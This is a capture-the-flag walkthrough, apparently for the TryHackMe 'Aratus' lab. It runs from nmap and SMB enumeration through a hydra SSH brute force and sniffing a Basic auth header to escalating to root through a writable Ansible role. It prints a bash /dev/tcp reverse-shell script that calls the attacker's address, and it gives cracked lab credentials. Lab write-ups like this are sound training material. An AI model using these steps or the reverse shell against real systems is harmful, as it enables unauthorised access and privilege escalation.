Aratus (SSH, Process, Ansible)
First, we need to enumerate using nmap.
$ nmap -A -p21,22,80,139,443 10.10.184.32
Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-30 13:13 +0630
Nmap scan report for 10.10.184.32
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.0.140
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_http-title: Apache HTTP Server Test Page powered by CentOS
139/tcp open netbios-ssn Samba smbd 4.10.16 (workgroup: WORKGROUP)
Service Info: Host: ARATUS; OS: Unix
Host script results:
|_clock-skew: mean: -40m50s, deviation: 1h09m13s, median: -53s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.16)
| Computer name: aratus
| NetBIOS computer name: ARATUS\x00
| Domain name: \x00
| FQDN: aratus
|_ System time: 2022-03-30T08:43:22+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-30T06:43:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.70 secondsLet's connect ftp and see what files are sharing. We found only pub diretory in this ftp. But no files are inside this directory.
➜ tryhackme ftp 10.10.184.32
Connected to 10.10.184.32.
220 (vsFTPd 3.0.2)
Name (10.10.184.32:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> Enumerate smb share and we found interesting share name temporary share
➜ tryhackme smbclient -L '\\10.10.184.32\'
Enter WORKGROUP\hnl's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
temporary share Disk
IPC$ IPC IPC Service (Samba 4.10.16)
SMB1 disabled -- no workgroup availableConnect it and see what files store in this share. And download message-to-simeon.txt. When I download .bash_history or something, I got access denied error.
➜ tryhackme smbclient '\\10.10.184.32\temporary share'
Enter WORKGROUP\hnl's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 10 19:36:44 2022
.. D 0 Tue Nov 23 22:54:05 2021
.bash_logout H 18 Wed Apr 1 08:47:30 2020
.bash_profile H 193 Wed Apr 1 08:47:30 2020
.bashrc H 231 Wed Apr 1 08:47:30 2020
.bash_history H 0 Wed Mar 30 13:07:29 2022
chapter1 D 0 Tue Nov 23 16:37:47 2021
chapter2 D 0 Tue Nov 23 16:38:11 2021a
chapter3 D 0 Tue Nov 23 16:38:18 2021
chapter4 D 0 Tue Nov 23 16:38:25 2021
chapter5 D 0 Tue Nov 23 16:38:33 2021
chapter6 D 0 Tue Nov 23 16:42:24 2021
chapter7 D 0 Tue Nov 23 17:44:27 2021
chapter8 D 0 Tue Nov 23 16:42:45 2021
chapter9 D 0 Tue Nov 23 16:42:53 2021
.ssh DH 0 Mon Jan 10 19:35:34 2022
.viminfo H 0 Wed Mar 30 13:07:29 2022
message-to-simeon.txt N 251 Mon Jan 10 19:36:44 2022
37726212 blocks of size 1024. 35598956 blocks available
smb: \> get message-to-simeon.txt
getting file \message-to-simeon.txt of size 251 as message-to-simeon.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)Read this interesting files. By reviewing message, he/she place the web directory on /home directory.
➜ aratus cat message-to-simeon.txt
Simeon,
Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project...
Also you password is insecure, could you please change it? It is all over the place now!
- TheodoreLet's enumerate to http service. We found only default httpd website which is hosted on centos or redhat.
http://10.10.184.32/simeon/ point to you some interesting page. There are too many words in this page and subpage.
So, we will change those words into wordlist.
╭─kali@kali ~/Desktop/ctf/tryhackme/aratus
╰─➤ cewl http://10.10.184.32/simeon/ --with-numbers > wordlists.txt
╭─kali@kali ~/Desktop/ctf/tryhackme/aratus
╰─➤ cat wordlists.txt| wc -c
1588And then, we will bruteforce ssh using this wordlists.
╭─kali@kali ~/Desktop/ctf/tryhackme/aratus
╰─➤ hydra -l simeon -P wordlists.txt ssh://10.10.184.32
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-31 11:00:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 207 login tries (l:1/p:207), ~13 tries per task
[DATA] attacking ssh://10.10.184.32:22/
[22][ssh] host: 10.10.184.32 login: simeon password: scelerisque
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-31 11:00:36After bruteforcing it, you will found a vaild username and password. Let's login to ssh using this creds.
╭─kali@kali ~/Desktop/ctf/tryhackme/aratus
╰─➤ ssh simeon@10.10.184.32
The authenticity of host '10.10.184.32 (10.10.184.32)' can't be established.
ECDSA key fingerprint is SHA256:5CxDqeYb3rPlNvmv3Hd+R2ZZuwoGQ/2fuul51QgP/N0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.184.32' (ECDSA) to the list of known hosts.
simeon@10.10.184.32's password:
Last failed login: Thu Mar 31 16:59:44 CEST 2022 from ip-10-9-0-140.eu-west-1.compute.internal on ssh:notty
There were 34 failed login attempts since the last successful login.
Last login: Mon Jan 10 14:07:52 2022 from 172.16.42.100
[simeon@aratus ~]$ whoami
simeonAfter checking some process, we found some interesting which is running ping command using root privileges.
Check again using pspy64, we found another interesting process which is run /home/theodore/scripts/test-www-auth.py
You already seen ping command is running with root privileges. Let's listen with tcpdump in loopback interface.
[simeon@aratus tmp]$ tcpdump -i lo -A[simeon@aratus tmp]$ tcpdump -i lo -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
17:18:01.060141 IP localhost > localhost: ICMP echo request, id 2018, seq 1, length 64
E..T..@.@.b............7....).Eb............................ !"#$%&'()*+,-./01234567
17:18:01.060162 IP localhost > localhost: ICMP echo reply, id 2018, seq 1, length 64
E..T....@..............7....).Eb............................ !"#$%&'()*+,-./01234567
17:18:01.231426 IP localhost.39816 > localhost.http: Flags [S], seq 3134750690, win 43690, options [mss 65495,sackOK,TS val 1727142 ecr 0,nop,wscale 7], length 0
E..<%D@.@..v...........P.............0.........
..Z.........
17:18:01.231455 IP localhost.http > localhost.39816: Flags [S.], seq 2506469898, ack 3134750691, win 43690, options [mss 65495,sackOK,TS val 1727142 ecr 1727142,nop,wscale 7], length 0
E..<..@.@.<..........P...e.
.........0.........
..Z...Z.....
17:18:01.231470 IP localhost.39816 > localhost.http: Flags [.], ack 1, win 342, options [nop,nop,TS val 1727142 ecr 1727142], length 0
E..4%E@.@..}...........P.....e.....V.(.....
..Z...Z.
17:18:01.231734 IP localhost.39816 > localhost.http: Flags [P.], seq 1:224, ack 1, win 342, options [nop,nop,TS val 1727142 ecr 1727142], length 223: HTTP: GET /test-auth/index.html HTTP/1.1
E...%F@.@..............P.....e.....V.......
..Z...Z.GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
17:16:02.936270 IP localhost > localhost: ICMP echo request, id 1992, seq 2, length 64
17:16:02.936291 IP localhost > localhost: ICMP echo reply, id 1992, seq 2, length 64
17:16:03.936265 IP localhost > localhost: ICMP echo request, id 1992, seq 3, length 64
17:16:03.936287 IP localhost > localhost: ICMP echo reply, id 1992, seq 3, length 64
17:16:04.936267 IP localhost > localhost: ICMP echo request, id 1992, seq 4, length 64Decode from base64. You will found theodore password.
╭─kali@kali ~/Desktop/tools
╰─➤ echo 'dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=' | base64 -d
theodore:Rijyaswahebceibarjik Let's login ssh using theodore credentials.
╭─kali@kali ~/Desktop/tools
╰─➤ ssh theodore@10.10.184.32
theodore@10.10.184.32's password:
Last login: Fri Mar 25 21:57:42 2022
[theodore@aratus ~]$ whoami
theodore
[theodore@aratus ~]$ cat /home/theodore/scripts/test-www-auth.py
#!/usr/bin/python3
import requests
url = "http://127.0.0.1/test-auth/index.html"
headers = {"Authorization" : "Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs="}
r = requests.get(url, headers=headers)
print(r)With sudo -l command something is running with automation user privileges.
[theodore@aratus ~]$ sudo -l
Matching Defaults entries for theodore on aratus:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User theodore may run the following commands on aratus:
(automation) NOPASSWD: /opt/scripts/infra_as_code.sh
[theodore@aratus ~]$ cat /opt/scripts/infra_as_code.sh
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yamlAnsible is running on this host. You can read what is ansible on google. It run all playbooks from this directory /opt/ansible/playbooks/.
[theodore@aratus tasks]$ pwd
/opt/ansible/roles/geerlingguy.apache/tasks
[theodore@aratus tasks]$ ls -al
total 36
drwxr-xr-x. 2 automation automation 228 Dec 2 11:55 .
drwxr-xr-x. 9 automation automation 178 Dec 2 11:55 ..
-rw-rw-r--. 1 automation automation 1693 Dec 2 11:55 configure-Debian.yml
-rw-rw-r--+ 1 automation automation 1123 Dec 2 11:55 configure-RedHat.yml
-rw-rw-r--. 1 automation automation 546 Dec 2 11:55 configure-Solaris.yml
-rw-rw-r--. 1 automation automation 711 Dec 2 11:55 configure-Suse.yml
-rw-rw-r--. 1 automation automation 1388 Dec 2 11:55 main.yml
-rw-rw-r--. 1 automation automation 193 Dec 2 11:55 setup-Debian.yml
-rw-rw-r--. 1 automation automation 198 Dec 2 11:55 setup-RedHat.yml
-rw-rw-r--. 1 automation automation 134 Dec 2 11:55 setup-Solaris.yml
-rw-rw-r--. 1 automation automation 133 Dec 2 11:55 setup-Suse.ymlWe will create reverse shell file on /tmp directory.
[theodore@aratus tasks]$ cat /tmp/shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.0.140/9001 0>&1
[theodore@aratus tasks]$ chmod 777 /tmp/shell.shAt the end of the file, we will insert this malicious definations.
Run this playbooks.
[theodore@aratus ~]$ sudo -u automation /opt/scripts/infra_as_code.shIn netcat session, we got reverse shell.
╭─kali@kali ~/Desktop/ctf/tryhackme/aratus
╰─➤ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.0.140] from (UNKNOWN) [10.10.184.32] 32926
[root@aratus automation]# whoami;hostname
whoami;hostname
root
aratusLast updated
Was this helpful?